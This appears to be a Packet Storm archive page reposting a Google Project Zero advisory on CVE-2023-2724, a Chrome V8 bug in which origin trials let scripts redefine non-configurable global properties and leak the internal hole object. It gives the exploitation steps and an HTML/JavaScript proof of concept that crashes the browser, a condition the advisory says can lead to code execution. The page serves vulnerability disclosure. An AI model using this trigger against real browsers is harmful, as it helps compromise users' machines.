exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Chrome Internal JavaScript Object Access Via Origin Trials

Chrome Internal JavaScript Object Access Via Origin Trials
Posted Jun 27, 2023
Authored by Google Security Research, Glazvunov

Chrome suffers from an internal javascript object access vulnerability. suffers from a code execution vulnerability.

tags | exploit, javascript, code execution
advisories | CVE-2023-2724
SHA-256 | ffd1bc4c7c03a984e8cd76542fd8b6610321410abd4663e7c81762fe8f30c5ae

Chrome Internal JavaScript Object Access Via Origin Trials

Change Mirror Download
Chrome: Internal JavaScript object access via Origin Trials

VULNERABILITY DETAILS
1. `JSObject::DefineAccessor` doesn't ensure that the receiver object is in a valid state before creating an accessor property. This allows callers to extend non-extensible objects and reconfigure non-configurable properties.
2. The function is reachable from `IDLMemberInstaller::InstallAttributes`:
```
IDLMemberInstaller::InstallAttributes ->
InstallAttribute ->
Object::SetAccessorProperty ->
JSObject::DefineAccessor
```
3. When an origin trial is activated through a `meta` tag, `InstallAttributes` might be called on a JS object that has already been modified by the user code.
4. Some origin trials install attributes directly on the global object.

To exploit the issue:

1. Add a non-configurable property to the global object.
2. Compile a JS function that accesses the property. The compilation dependency in [1] will be skipped.
3. Enable an origin trial that redefines the property as configurable.
4. Delete the property.

After that, the compiled function will reference an invalid property cell and leak the internal hole object. This is a known vulnerable condition that can be abused to execute arbitrary code.

[1] https://source.chromium.org/chromium/chromium/src/+/refs/heads/main:v8/src/compiler/js-native-context-specialization.cc;drc=837cc12de25a288edf3ac222f7265c9936e69552;l=1164


VERSION
Google Chrome 112.0.5615.49 (Official Build) (arm64)
Chromium 114.0.5713.0 (Developer Build) (64-bit)


REPRODUCTION CASE
```
<body>
<script>
var container = [{}];
function trigger() { container[0] = documentPictureInPicture; }

Reflect.defineProperty(
globalThis,
'documentPictureInPicture',
{ configurable: false, writable: true, value: {} });
documentPictureInPicture = {}; // Now `documentPictureInPicture` is a non-configurable mutable slot.
for (let i = 0; i < 50000; i++) trigger();

// The \"Document Picture-in-Picture\" origin trial force-sets the `documentPictureInPicture` property
// on the global object.
meta = document.createElement('meta');
meta.httpEquiv = 'Origin-Trial';
meta.content =
'AstD02iOsmKKlxPbuURr1i4CKzX6AhBpjqxCMNIinwFqsdNThmojsMI8B7m8GGlR/DNu9i6t4eqEfHvhuvSxHgQAAABe' +
'eyJvcmlnaW4iOiJodHRwOi8vbG9jYWxob3N0OjgwMDAiLCJmZWF0dXJlIjoiRG9jdW1lbnRQaWN0dXJlSW5QaWN0dXJl' +
'QVBJIiwiZXhwaXJ5IjoxNjk0MTMxMTk5fQ==';
document.head.appendChild(meta);

delete documentPictureInPicture;
trigger();
container[0].prop; // Trying to access a property of the hole object should cause to a crash.
</script>
</body>
```


CREDIT INFORMATION
Sergei Glazunov of Google Project Zero


This bug is subject to a 90-day disclosure deadline. If a fix for this issue is made available to users before the end of the 90-day deadline, this bug report will become public 30 days after the fix was made available. Otherwise, this bug report will become public at the deadline. The scheduled deadline is 2023-07-13.


Related CVE Numbers: CVE-2023-2724.



Found by: glazunov@google.com

Login or Register to add favorites

File Archive:

August 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    15 Files
  • 2
    Aug 2nd
    22 Files
  • 3
    Aug 3rd
    0 Files
  • 4
    Aug 4th
    0 Files
  • 5
    Aug 5th
    15 Files
  • 6
    Aug 6th
    11 Files
  • 7
    Aug 7th
    43 Files
  • 8
    Aug 8th
    42 Files
  • 9
    Aug 9th
    36 Files
  • 10
    Aug 10th
    0 Files
  • 11
    Aug 11th
    0 Files
  • 12
    Aug 12th
    27 Files
  • 13
    Aug 13th
    18 Files
  • 14
    Aug 14th
    50 Files
  • 15
    Aug 15th
    33 Files
  • 16
    Aug 16th
    23 Files
  • 17
    Aug 17th
    0 Files
  • 18
    Aug 18th
    0 Files
  • 19
    Aug 19th
    43 Files
  • 20
    Aug 20th
    0 Files
  • 21
    Aug 21st
    0 Files
  • 22
    Aug 22nd
    0 Files
  • 23
    Aug 23rd
    0 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    0 Files
  • 27
    Aug 27th
    0 Files
  • 28
    Aug 28th
    0 Files
  • 29
    Aug 29th
    0 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close